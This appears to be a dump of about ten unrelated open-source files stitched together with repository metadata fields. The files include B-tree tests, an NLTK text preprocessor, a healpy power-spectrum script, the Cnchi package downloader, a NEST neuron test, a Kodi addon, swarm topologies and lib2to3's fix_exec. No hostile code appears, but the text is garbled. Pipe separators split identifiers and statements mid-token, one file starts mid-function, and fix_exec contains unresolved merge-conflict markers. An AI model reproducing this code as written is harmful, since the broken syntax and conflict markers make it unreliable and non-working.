tree.insert(x, str(x))
self.validate_tree(tree)
# Triggers taking a key from left sibling
tree.remove(7)
seq.remove(7)
self.assertEqual(seq, walk_keys(tree))
# Triggers merge right
tree.remove(19)
seq.remove(19)
self.assertEqual(seq, walk_keys(tree))
# Triggers taking a key from right sibling
tree.remove(15)
seq.remove(15)
self.assertEqual(seq, walk_keys(tree))
# Delete all
for x in list(seq):
tree.remove(x)
seq.remove(x)
self.assertEqual(seq, walk_keys(tree))
self.validate_empty_tree(tree)
def test_delete_subtree(self):
"""Tests find predecessor/successor for subtrees"""
tree = BTree.create("tree", 3)
seq = list(range(25))
for x in seq:
tree.insert(x, str(x))
self.assertEqual(seq, walk_keys(tree))
tree.remove(8)
seq.remove(8)
self.assertEqual(seq, walk_keys(tree))
tree.remove(9)
seq.remove(9)
self.assertEqual(seq, walk_keys(tree))
self.assertEqual(len(seq), tree.tree_size())
def test_get_by_index(self):
tree = BTree.create("tree", 2)
items = [(x, str(x)) for x in range(50)]
for x in items:
tree.insert(*x)
for i in range(len(items)):
self.assertEqual(items[i], tree[i])
self.assertRaises(IndexError, tree.__getitem__, len(items) + 1)
self.assertEqual(items, tree[0:tree.tree_size()] |
deka108/meas_deka | apiv2/utils/text_util.py | Python | apache-2.0 | 2,391 | 0.000418 | import re
from nltk.corpus import stopwords
from nltk.corpus import words
from nltk.stem.snowball import SnowballStemmer
from apiv2.models import QuestionText, Question
from apiv2.search.fsearch import formula_extractor as fe
cachedStopWords = stopwords.words("english")
english_vocab = set(w.lower() for w in words.words())
stemmer = SnowballStemmer("english")
# Full text index search
def to_lower(text):
return ' '.join([word.lower() for word in text.split()])
def remove_stopwords(text):
return ' '.join([word for word in text.split() if len(word) > 2 and word
not in cachedStopWords])
def english_only(text):
return ' '.join([word for word in text.split() if word in english_vocab])
def stem_text(text):
return ' '.join([st | emmer.stem(word) for word in text.split()])
def preprocess(text, **kwargs):
preprocessed_text = text
# Recognise and remove LaTeX (detect formula function)
preprocessed_text = clean_latex(preprocessed_text)
# Remove non alphabetical characters
preprocessed_text = remove_non_alphabet(preprocessed_text)
# Convert to lower case
preprocessed_text = to_lower(preprocessed_text)
# Remove stopwords
preprocessed_text = remove_stopwords(preprocessed_text)
# Filt | er words
if kwargs.get("english", True):
preprocessed_text = english_only(preprocessed_text)
if kwargs.get("stem", True):
preprocessed_text = stem_text(preprocessed_text)
return preprocessed_text
def preprocess_unique(text, **kwargs):
results = preprocess(text, **kwargs).split()
return ' '.join(set(results))
def remove_non_alphabet(text):
text = re.sub(r'[^a-zA-Z]', " ", text)
return text
def clean_latex(text):
text = re.sub(fe.DOUBLE_DOLLAR_NOTATION, " ", text)
text = re.sub(fe.PAREN_NOTATION, " ", text)
text = re.sub(fe.BRACKET_NOTATION, " ", text)
return text
def preprocess_query(text):
text = preprocess(text)
return text
def preprocess_question_text_object(stem=True):
QuestionText.objects.all().delete()
questions = Question.objects.all()
for question in questions:
preprocessed_text = preprocess(question.content, stem)
print(preprocessed_text)
question_text = QuestionText(
content=preprocessed_text,
question=question
)
question_text.save() |
tbs1980/cosmo-codes | peebles/larura_pcl.py | Python | mpl-2.0 | 5,243 | 0.040244 | from subprocess import call
import matplotlib.pyplot as plt
import numpy as np
import healpy as hp
import sys
import time
map_to_alm='Map2Alm'
alm_to_cl='Alm2Cl'
spice_data='spice_data.fits'
spice_data_alm='spice_data_alm.fits'
spice_noise='spice_noise.fits'
spice_noise_alm='spice_noise_alm.fits'
spice_mask='spice_mask.fits'
spice_dl='spice_dl.dat'
spice_nl='spice_nl.dat'
spice_bl='spice_bl.dat'
spice_crr='spice_crr.dat'
spice_ilm_jlm='spice_ilm_jlm.dat'
def get_mask_file(inv_noise_map):
mask=np.zeros(np.shape(inv_noise_map))
mask[inv_noise_map>0]=1
return mask
def compute_peebles_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps):
#write the data file
d = hp.read_map(data_file)
hp.write_map(spice_data,m=d)
#create a mask file from inv_noise
inv_n = hp.read_map(inv_noise_file)
msk = get_mask_file(inv_n)
hp.write_map(spice_mask,m=msk)
if d.shape != inv_n.shape :
raise RuntimeError("data and noise have different dimensions")
nside=hp.npix2nside(np.shape(d)[0])
#write the noise map
n = np.zeros(np.shape(inv_n))
n[inv_n>0] = 1./np.sqrt(inv_n[inv_n>0])
#write the beam file
| B_l_in = np.loadtxt(beam_file,delimiter=",")
np.savetxt(spice_bl,np.asarray([B_l_in[:,0],B_l_in[:,1]]).T,fmt='%d %0.2f')
B_l = B_l_in[:,1]
#compute the powe spectrum of the data
call([map_to_alm,'-I',spice_data,'-O',spice_data_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_data_alm,'-O',spice_ | dl,'-P','-m',spice_mask,'-G','-C',spice_ilm_jlm,'-M',spice_data,'-N',str(nside),'-L',str(2*nside+1)])
call(['rm',spice_data_alm])
call(['rm',spice_data])
#read the power spectrum
D_l = np.loadtxt(spice_dl,skiprows=2)[:,1]
#apply beam to the cls
D_l /= B_l**2
#compute the noise power spectrum using Monte Carlo
N_l = np.zeros(np.shape(D_l))
# subtract
S_l = D_l - N_l
#delete the mask
call(['rm',spice_mask])
call(['rm',spice_dl])
call(['rm',spice_bl])
return (D_l,N_l,S_l)
def compute_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps):
#write the data file
d = hp.read_map(data_file)
hp.write_map(spice_data,m=d)
#create a mask file from inv_noise
inv_n = hp.read_map(inv_noise_file)
msk = get_mask_file(inv_n)
hp.write_map(spice_mask,m=msk)
if d.shape != inv_n.shape :
raise RuntimeError("data and noise have different dimensions")
nside=hp.npix2nside(np.shape(d)[0])
#write the noise map
n = np.zeros(np.shape(inv_n))
n[inv_n>0] = 1./np.sqrt(inv_n[inv_n>0])
#write the beam file
B_l_in = np.loadtxt(beam_file,delimiter=",")
np.savetxt(spice_bl,np.asarray([B_l_in[:,0],B_l_in[:,1]]).T,fmt='%d %0.2f')
B_l = B_l_in[:,1]
#compute the powe spectrum of the data
call([map_to_alm,'-I',spice_data,'-O',spice_data_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_data_alm,'-O',spice_dl,'-m',spice_mask,'-M',spice_data,'-N',str(nside),'-L',str(2*nside+1)])
call(['rm',spice_data_alm])
call(['rm',spice_data])
#read the power spectrum
D_l = np.loadtxt(spice_dl,skiprows=2)[:,1]
#apply beam to the cls
D_l /= B_l**2
#compute the noise power spectrum using Monte Carlo
N_l = np.zeros(np.shape(D_l))
mu = np.zeros(np.shape(d))
sig= np.ones(np.shape(d))
for samp in range(num_samps):
if samp % 100 == 0 :
print "samples taken =",samp
# draw a realisation from noise
n_i = n*np.random.normal(mu,sig)
#write this to file
hp.write_map(spice_noise,m=n_i)
# find the power spectrum of this realisation
call([map_to_alm,'-I',spice_noise,'-O',spice_noise_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_noise_alm,'-O',spice_nl,'-m',spice_mask,'-M',spice_noise,'-N',str(nside),'-L',str(2*nside+1)])
#read the power spectrum
N_l_i = np.loadtxt(spice_nl,skiprows=2)[:,1]
# accumulate
N_l += N_l_i
#delete the noise realisation
call(['rm',spice_noise])
call(['rm',spice_noise_alm])
N_l /= float(num_samps)
#apply beam to the nls
N_l /= B_l**2
# subtract
S_l = D_l - N_l
#delete the mask
call(['rm',spice_mask])
call(['rm',spice_nl])
call(['rm',spice_dl])
call(['rm',spice_bl])
return (D_l,N_l,S_l)
def write_pcl(output_file,C_l,N_l,S_l):
ell=np.arange(0,np.shape(S_l)[0])
np.savetxt(output_file,np.asarray([ell,C_l,N_l,S_l]).T,delimiter=",")
if __name__ == "__main__":
if len(sys.argv) == 6 :
start_time = time.time()
data_file = sys.argv[1]
inv_noise_file =sys.argv[2]
beam_file = sys.argv[3]
output_file = sys.argv[4]
num_samps = int(sys.argv[5])
C_l,N_l,S_l = compute_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps)
write_pcl(output_file,C_l,N_l,S_l)
print ""
print (time.time() - start_time) / 60.0, 'minutes'
else:
print "usage: python ",sys.argv[0],"<data> <inv-noise-cov-mat> <beam-file> <output-cl-file> <n-samps>"
print "example: python",sys.argv[0], "./data.fits ./invNoise.fits ./window_func_temp_ns128.bl ./base.pcl 100"
|
yucefsourani/Cnchi | cnchi/download/download_requests.py | Python | gpl-3.0 | 7,157 | 0.001956 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# download_requests.py
#
# Copyright © 2013-2015 Antergos
#
# This file is part of Cnchi.
#
# Cnchi is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cnchi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cnchi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
""" Module to download packages using requests library """
import os
import logging
import queue
import shutil
import requests
import time
class Download(object):
""" Class to download packages using urllib
This class tries to previously download all necessary packages for
Antergos installation using urllib """
def __init__(self, pacman_cache_dir, cache_dir, callback_queue):
""" Initialize Download class. Gets default configuration """
self.pacman_cache_dir = pacman_cache_dir
self.cache_dir = cache_dir
self.callback_queue = callback_queue
# Stores last issued event (to prevent repeating events)
self.last_event = {}
def start(self, downloads):
""" Downloads using requests """
downloaded = 0
total_downloads = len(downloads)
all_successful = True
self.queue_event('downloads_progress_bar', 'show')
self.queue_event('downloads_percent', '0')
while len(downloads) > 0:
identity, element = downloads.popitem()
self.queue_event('percent', '0')
txt = _("Downloading {0} {1} ({2}/{3})...")
txt = txt.format(element['identity'], element['version'], downloaded + 1, total_downloads)
self.queue_event('info', txt)
try:
total_length = int(element['size'])
except TypeError:
# We will get the total length from the requests GET
pass
# logging.warning(_("Metalink for package %s has no size info"), element['identity'])
# total_length = 0
# If the user doesn't give us a cache dir to copy xz files from, self.cache_dir will be None
if self.cache_dir:
dst_cache_path = os.path.join(self.cache_dir, element['filename'])
else:
dst_cache_path = ""
dst_path = os.path.join(self.pacman_cache_dir, element['filename'])
needs_to_download = True
if os.path.exists(dst_path):
# File already exists (previous install?) do not download
logging.warning(_("File %s already exists, Cnchi will not overwrite it"), element['filename'])
needs_to_download = False
downloaded += 1
elif self.cache_dir and os.path.exists(dst_cache_path):
# We're lucky, the package is already downloaded in the cache the user has given us
# let's copy it to our destination
logging.debug(_('%s found in iso pkg cache. Copying...'), element['filename'])
try:
shutil.copy(dst_cache_path, dst_path)
needs_to_download = False
downloaded += 1
except OSError as os_error:
logging.warning(_("Error copying %s to %s. Cnchi will try to download it"), dst_cache_path, dst_path)
logging.error(os_error)
needs_to_download = True
if needs_to_download:
# Let's download our filename using url
for url in element['urls']:
# msg = _("Downloading file from url {0}").format(url)
# logging.debug(msg)
percent = 0
completed_length = 0
start = time.clock()
r = requests.get(url, stream=True)
total_length = int(r.headers.get('content-length'))
if r.status_code == requests.codes.ok:
with open(dst_path, 'wb') as xz_file:
for data in r.iter_content(1024):
if not data:
break
xz_file.write(data)
completed_length += len(data)
old_percent = percent
if total_length > 0:
percent = round(float(completed_length / total_length), 2)
else:
percent += 0.1
if old_percent != percent:
self.queue_event('percent', percent)
progress_text = "{0} {1} bps".format(percent, completed_length // (time.clock() - start))
self.queue_event('progress_bar_text', progress_text)
download_error = False
downloaded += 1
| break
else:
download_error = True
msg = _("Can't download {0}, Cnchi will try another mirror.").format(url)
# completed_length = 0
logging.warning(msg)
if download_error:
# None of the mirror urls works.
# This is not a total disaster, maybe alpm will be able
# to download it for us later in pac.py
| msg = _("Can't download {0}, even after trying all available mirrors")
msg = msg.format(element['filename'])
all_successful = False
logging.error(msg)
downloads_percent = round(float(downloaded / total_downloads), 2)
self.queue_event('downloads_percent', str(downloads_percent))
self.queue_event('downloads_progress_bar', 'hide')
return all_successful
def queue_event(self, event_type, event_text=""):
""" Adds an event to Cnchi event queue """
if self.callback_queue is None:
if event_type != "percent":
logging.debug("{0}: {1}".format(event_type, event_text))
return
if event_type in self.last_event:
if self.last_event[event_type] == event_text:
# do not repeat same event
return
self.last_event[event_type] = event_text
try:
# Add the event
self.callback_queue.put_nowait((event_type, event_text))
except queue.Full:
pass
|
dimddev/NetCatKS | NetCatKS/Components/api/interfaces/factories/__init__.py | Python | bsd-2-clause | 65 | 0 | """
A good p | lace for fatories interfaces
"""
__author_ | _ = 'dimd'
|
hesam-setareh/nest-simulator | pynest/nest/tests/test_siegert_neuron.py | Python | gpl-2.0 | 4,811 | 0 | # -*- coding: utf-8 -*-
#
# test_siegert_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the siegert_neuron in NEST.
import nest
import unittest
import numpy as np
HAVE_GSL = nest.sli_func("statusdict/have_gsl ::")
@nest.check_stack
@unittest.skipIf(not HAVE_GSL, 'GSL is not available')
class SiegertNeuronTestCase(unittest.TestCase):
"""
Test siegert_neuron
Details
-------
Compares the rate of a Poisson-driven iaf_psc_delta neuron
with the prediction from the siegert neuron.
"""
def setUp(self):
# test parameter to compare analytic solution to simulation
self.rtol = 1.0
# test parameters
self.N = 100
self.rate_ex = 1.5 * 1e4
self.J = 0.1
# simulation parameters
self.simtime = 500.
self.dt = 0.1
self.start = 200.
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
nest.SetKernelStatus(
{'resolution': self.dt, 'use_wfr': False, 'print_time': True})
# set up driven integrate-and-fire neuron
self.iaf_psc_delta = nest.Create(
'iaf_psc_delta', self.N) # , params={"C_m": 1.0})
self.poisson_generator = nest.Create(
'poisson_generator', params={'rate': self.rate_ex})
nest.Connect(self.poisson_generator, self.iaf_psc_delta,
syn_spec={'weight': self.J, 'delay': self.dt})
self.spike_detector = nest.Create(
"spike_detector", params={'start': self.start})
nest.Connect(
self.iaf_psc_delta, self.spike_detector)
# set up driven siegert neuron
neuron_status = nest.GetStatus(self.iaf_psc_delta)[0]
siegert_params = {'tau_m': neuron_status['tau_m'],
't_ref': neuron_status['t_ref'],
'theta': neuron_status['V_th'] -
neuron_status['E_L'],
'V_reset': neuron_status['V_reset'] -
neuron_status['E_L']}
self.siegert_neuron = nest.Create(
'siegert_neuron', params=siegert_params)
self.siegert_drive = nest.Create(
'siegert_neuron', 1, params={'mean': self.rate_ex})
J_mu_ex = neuron_status['tau_m'] * 1e-3 * self.J
J_sigma_ex = neuron_status['tau_m'] * 1e-3 * self.J**2
syn_dict = {'drift_factor': J_mu_ex, 'diffusion_factor':
J_sigma_ex, 'model': ' | diffusion_connection'}
nest.Connect(
self.siegert_drive, self.siegert_neuron, syn_spec=syn_dict)
self.multimeter = nest.Create(
"multimeter", params={'record_from': ['rate'],
| 'interval': self.dt})
nest.Connect(
self.multimeter, self.siegert_neuron)
def test_RatePrediction(self):
"""Check the rate prediction of the siegert neuron"""
# simulate
nest.Simulate(self.simtime)
# get rate prediction from siegert neuron
events = nest.GetStatus(self.multimeter)[0]["events"]
senders = events['senders']
rate = events['rate'][np.where(senders == self.siegert_neuron)]
rate_prediction = rate[-1]
# get simulated rate of integrate-and-fire neuron
rate_iaf = nest.GetStatus(self.spike_detector)[0][
"n_events"] / ((self.simtime - self.start) * 1e-3) / self.N
# test rate prediction against simulated rate of
# integrate-and-fire neuron
self.assertTrue(np.isclose(rate_iaf, rate_prediction, rtol=self.rtol))
# test rate prediction against hard coded result
rate_prediction_test = 27.1095934379
self.assertTrue(np.isclose(rate_prediction_test, rate_prediction))
def suite():
# makeSuite is sort of obsolete http://bugs.python.org/issue2721
# using loadTestsFromTestCase instead.
suite1 = unittest.TestLoader().loadTestsFromTestCase(
SiegertNeuronTestCase)
return unittest.TestSuite([suite1])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
rafa400/telepi | script.telepi-master/addon.py | Python | gpl-2.0 | 669 | 0.031484 | import xbmcaddon
import xbmcgui
import subprocess,os
def EstoEsUnaFun( str ):
xbmcgui.Dialog().ok("ESO ES" | ,"AHHHH",str)
return
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Hello World!"
line2 = "We can write anything we want here"
line3 = "Using Python"
my_s | etting = addon.getSetting('my_setting') # returns the string 'true' or 'false'
addon.setSetting('my_setting', 'false')
os.system("echo caca>>/home/rafa400/caca.txt")
dia=xbmcgui.Dialog();
dia.addControl(xbmcgui.ControlLabel(x=190, y=25, width=500, height=25, label="Hoooolaa"))
dia.ok(addonname, line1, line2, line3 + my_setting)
#xbmcgui.Window().show()
|
pcamp/google-appengine-wx-launcher | launcher/taskcontroller.py | Python | apache-2.0 | 12,617 | 0.005627 | #!/usr/bin/env python
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import subprocess
import webbrowser
import wx
import launcher
# TODO: rename this file task_controller.py in a big renameathon
class TaskController(object):
"""Main conroller (MVC) for running tasks.
Tasks are running instances of App Engine projects.
"""
def __init__(self, app_controller):
"""Create a new TaskController.
Args:
app_controller: the main application controller.
"""
self._app_controller = app_controller
# self._frame: the main frame for project display
# self._threads: an array of threads for running App Engine applicatons
# self._consoles: an array of LogConsoles for App Engine applications
self._frame = None
self._threads = []
self._consoles = []
self._runtime = None
self._platform = launcher.Platform()
self._preferences = None
def SetModelsViews(self, frame=None, runtime=None, platform=None,
preferences=None):
"""Set models and views (MVC) for this controller.
We need a pointer to the main frame. We can't do in __init__
since those objects wants a pointer to me as well, and one must
come first. Convention for launcher is for model/view to take
controllers in their __init__, and have the controller accept it
later with a call to SetModelsViews().
Args:
frame: the main frame (MainFrame) for the app
runtime: a launcher.Runtime
platform: a launcher.Platform
preferences: a launcher.Preferences
"""
if frame:
self._frame = frame
if runtime:
self._runtime = runtime
if platform:
self._platform = platform
if preferences:
self._preferences = preferences
def _GenericRun(self, extra_flags=None):
"""Run the project(s) selected in the main frame.
Args:
extra_flags: a list of extra command line flags for the run command
"""
for project in self._frame.SelectedProjects():
cmd = None
err = ""
try:
if self._FindThreadForProject(project):
logging.warning('Already running a task for %s!' % project.path)
else:
cmd = self._runtime.DevAppServerCommand(project,
extra_flags=extra_flags)
except launcher.RuntimeException, r:
err = r.message
if not cmd or err:
logging.error(err + '\n'
'Cannot run project %s. Please confirm '
'these values in your Preferences, or take an '
'appropriate measure to fix it (e.g. install Python).'
% project.path)
else:
t = self._CreateTaskThreadForProject(project, cmd)
t.start()
self._threads.append(t)
def _OpenFile(self, path, run_open_cmd):
"""Open file in browser.
Will launch external browser in platform dependent manner.
Args:
path: Absolute path to open.
"""
opencmd = self._platform.OpenCommand(path)
if not opencmd:
logging.warning('Could not form an open command, sorry')
return
run_open_cmd(opencmd)
def OpenSDK(self, event, run_open_cmd=subprocess.Popen):
"""Open SDK in browser.
Called from UI menu.
"""
sdk_dir = self._platform.AppEngineBaseDirectory()
self._OpenFile(sdk_dir, run_open_cmd)
def Run(self, event):
"""Run the project(s) selected in the main frame.
Called directly from UI.
"""
self._GenericRun()
def RunStrict(self, event):
"""Run the project(s) selected in the main frame, strictly.
Called directly from UI.
"""
self._GenericRun(['--require_indexes'])
def _CreateTaskThreadForProject(self, project, cmd):
"""Create and return a task thread, for executing cmd on project.
Assumes the task thread is for running dev_appserver.
Split into a seperate method to make unit testing of self.Run() easier.
Args:
project: the Project that needs a thread
cmd: list of exec and args; the command to execute,
associated with the project
"""
return launcher.DevAppServerTaskThread(self, project, cmd)
def Stop(self, event):
"""Stop the project(s) selected in the main frame.
Called directly from UI.
"""
for project in self._frame.SelectedProjects():
thread = self._FindThreadForProject(project)
if not thread:
if project.runstate == launcher.Project.STATE_DIED:
# Just clearing out a stop.
project.runstate = launcher.Project.STATE_STOP
self.RunStateChanged(project)
else:
logging.warning('Cannot find a running task for %s!' % project.path)
else:
thread.stop() # async
pass
def Browse(self, event):
"""Browse the project(s) selected in the main frame if they are running.
Called directly from UI.
"""
project_list = [p for p in self._frame.SelectedProjects()
if p.runstate == launcher.Project.STATE_RUN]
if not project_list:
logging.warning('No selected projects are running ' +
'so we have nothing to Browse.')
return
for project in project_list:
self._BrowseProject(project)
def _FindOrCreateConsole(self, project):
"""Find and return the launcher.LogConsole for project; create if needed.
Args:
project: the Project associated (or to be associated with) the LogConsole
"""
for console in self._consoles:
if project == console.project:
return console
console = launcher.LogConsole(project)
self._consoles.append(console)
return console
def StopAll(self, _=None):
"""Stop all projects.
Args:
_: not used (made consisten | t with Stop/Run for easier testing)
"""
[t.stop() for t in self._threads] # t.stop() is async.
def _FindThreadForProject(self, project):
"""Find and return the launcher.TaskThread for project, or None.
Args:
pr | oject: the project whose thread we are looking for
"""
for thread in self._threads:
if thread.project == project:
return thread
return None
def Logs(self, event):
"""Display the Console window for the project(s) selected in the main frame.
Called directly from UI.
"""
for project in self._frame.SelectedProjects():
console = self._FindOrCreateConsole(project)
console.DisplayAndBringToFront()
def SdkConsole(self, event):
"""Opens the local SDK Administration console.
The Console is opened for the project(s) selected in the main frame.
The URL looks something like http://localhost:PORT/_ah/admin.
Called directly from UI.
"""
project_list = [p for p in self._frame.SelectedProjects()
if p.runstate == launcher.Project.STATE_RUN]
if not project_list:
logging.warning('No selected projects are running ' +
'so we have no Admin Console to go to.')
return
for project in project_list:
self._BrowseAdminConsoleForProject(project)
def Edit(self, event, run_edit_cmd=subprocess.Popen):
"""Opens, for edit, the project(s) selected in the main frame.
Called directly from UI.
Args:
event: a wxPython event (for all Bind()ings)
run_edit_cmd: the command used to run the actual tuple edit command.
Only ever set to the non-default in a unit test.
"""
for project in self._frame.SelectedProjects():
editor = self._preferences[launcher.Preferences.PREF_EDITOR]
editcmd = self._platform.EditCommand(editor, project.path)
|
jepegit/cellpy | dev_utils/helpers/performance.py | Python | mit | 2,592 | 0.002315 | import os
import sys
import time
print(f"running {sys.argv[0]}")
import cellpy
from cellpy import cellreader, log
from cellpy.parameters import prms
# -------- defining overall path-names etc ----------
current_file_path = os.path.dirname(os.path.realpath(__file__))
relative_test_data_dir = "../testdata"
test_data_dir = os.path.abspath(os.path.join(current_file_path, relative_test_data_dir))
test_data_dir_raw = os.path.join(test_data_dir, "data")
test_res_file = "20160805_test001_45_cc_01.res"
test_res_file_full = os.path.join(test_data_dir_raw, test_res_file)
test_data_dir_out = os.path.join(test_data_dir, "out")
test_data_dir_cellpy = os.path.join(test_data_dir, "hdf5")
test_cellpy_file = "20160805_test001_45_cc.h5"
test_cellpy_file_tmp = "tmpfile.h5"
test_cellpy_file_full = os.path.join(test_data_dir_cellpy, test_cellpy_file)
test_cellpy_file_tmp_full = os.path.join(test_data_dir_cellpy, test_cellpy_file_tmp)
test_run_name = "20160805_test001_45_cc"
log.setup_logging(default_level="DEBUG")
new_arbin_file = (
r"C:\Scripting\Processing\Celldata\indata\NewArbin\20170907_sic024_01_cc_01.res"
)
new_arbin_mass = 0.824098422
def load_it(cellpy_data_instance):
# cellpy_data_instance.loadcell(test_res_file_full)
raw_file_loader = cellpy_data_instance.loader
test = raw_file_loader(test_res_file_full)
cellpy_data_instance.datasets.append(test[0])
def append_to_it(cellpy_data_instance):
raw_file_loader = cellpy_data_instance.loader
test = raw_file_loader(test_res_file_full)
cellpy_data_instance.datasets.append(test[0])
def info(cellpy_data_instance):
print(f"\nINFO ON {cellpy_data_instance}")
for dataset in cellpy_data_instance.datasets:
print(dataset)
def report_time(t1, t2):
txt = f"used: {t2-t1} seconds"
print(txt)
def time_routine():
d = cellreader.CellpyData()
# size pr chunk used by pandas when loading:
prms.Instruments.Arbin.chunk_size = 10000
# stops loading when reaching this:
prms.Instruments.Arbin.max_chunks = 1
t1 = time.time()
load_it(d)
# set new current chunk
# append_to_it(d)
t2 = time.time()
# d.make_step_table()
# d.make_summary()
# info(d)
print("-- | ----------------finished------------------")
report_time(t1, t2)
def missing_stats_file():
d = cellreader.CellpyData()
raw_file_loader = d.l | oader
test = raw_file_loader(new_arbin_file)
d.cells.append(test[0])
d.set_mass(new_arbin_mass)
d.make_summary(use_cellpy_stat_file=False)
if __name__ == "__main__":
missing_stats_file()
|
aarongarrett/inspyred | inspyred/swarm/topologies.py | Python | mit | 4,282 | 0.008174 | """
=====================================
:mod:`topologies` -- Swarm topologies
=====================================
This module defines various topologies for swarm intelligence algorithms.
Particle swarms make use of topologies, which determine the logical
relationships among particles in the swarm (i.e., which ones belong to the same
"neighborhood"). All topology functions have the following arguments:
- *random* -- the random number generator object
- *population* -- the population of Particles
- *args* -- a dictionary of keyword arguments
Each topology function returns a list of lists of neighbors
for each particle in the population. For example, if a swarm
contained 10 particles, then this function would return a list
containing 10 lists, each of which contained the neighbors for
its corresponding particle in the population.
Rather than constructing and returning a list of lists directly, the
topology functions could (and probably *should*, for efficiency) be
written as generators that yield each neighborhood list one at a
time. This is how the existing topology functions operate.
.. Copyright 2012 Aaron Garrett
.. Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
.. The above copyright notice and | this permission notice shall be included in
all copies or substantial portions of the Software.
.. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO | THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
.. module:: topologies
.. moduleauthor:: Aaron Garrett <garrett@inspiredintelligence.io>
"""
def star_topology(random, population, args):
"""Returns the neighbors using a star topology.
This function sets all particles as neighbors for all other particles.
This is known as a star topology. The resulting list of lists of
neighbors is returned.
.. Arguments:
random -- the random number generator object
population -- the population of particles
args -- a dictionary of keyword arguments
"""
for _ in range(len(population)):
yield population[:]
def ring_topology(random, population, args):
"""Returns the neighbors using a ring topology.
This function sets all particles in a specified sized neighborhood
as neighbors for a given particle. This is known as a ring
topology. The resulting list of lists of neighbors is returned.
.. Arguments:
random -- the random number generator object
population -- the population of particles
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *neighborhood_size* -- the width of the neighborhood around a
particle which determines the size of the neighborhood
(default 3)
"""
neighborhood_size = args.setdefault('neighborhood_size', 3)
half_hood = neighborhood_size // 2
neighbor_index_start = []
for index in range(len(population)):
if index < half_hood:
neighbor_index_start.append(len(population) - half_hood + index)
else:
neighbor_index_start.append(index - half_hood)
neighbors = []
for start in neighbor_index_start:
n = []
for i in range(0, neighborhood_size):
n.append(population[(start + i) % len(population)])
yield n
|
ArcherSys/ArcherSys | Lib/lib2to3/fixes/fix_exec.py | Python | mit | 3,143 | 0.007636 | <<<<<<< HEAD
<<<<<<< HEAD
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for exec.
This converts usages of the exec statement into calls to a built-in
exec() function.
exec code in ns1, ns2 -> exec(code, ns1, ns2)
"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Comma, Name, Call
class FixExec(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
exec_stmt< 'exec' a=any 'in' b=any [',' c=any] >
|
exec_stmt< 'exec' (not atom<' | (' [any] ')'>) a=any >
"""
def transform(self, node, results):
assert results
syms = self.syms
a = results["a"]
b = results.get("b")
c = results.get("c")
args = [a.clone()]
args[0].prefix = ""
if b is | not None:
args.extend([Comma(), b.clone()])
if c is not None:
args.extend([Comma(), c.clone()])
return Call(Name("exec"), args, prefix=node.prefix)
=======
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for exec.
This converts usages of the exec statement into calls to a built-in
exec() function.
exec code in ns1, ns2 -> exec(code, ns1, ns2)
"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Comma, Name, Call
class FixExec(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
exec_stmt< 'exec' a=any 'in' b=any [',' c=any] >
|
exec_stmt< 'exec' (not atom<'(' [any] ')'>) a=any >
"""
def transform(self, node, results):
assert results
syms = self.syms
a = results["a"]
b = results.get("b")
c = results.get("c")
args = [a.clone()]
args[0].prefix = ""
if b is not None:
args.extend([Comma(), b.clone()])
if c is not None:
args.extend([Comma(), c.clone()])
return Call(Name("exec"), args, prefix=node.prefix)
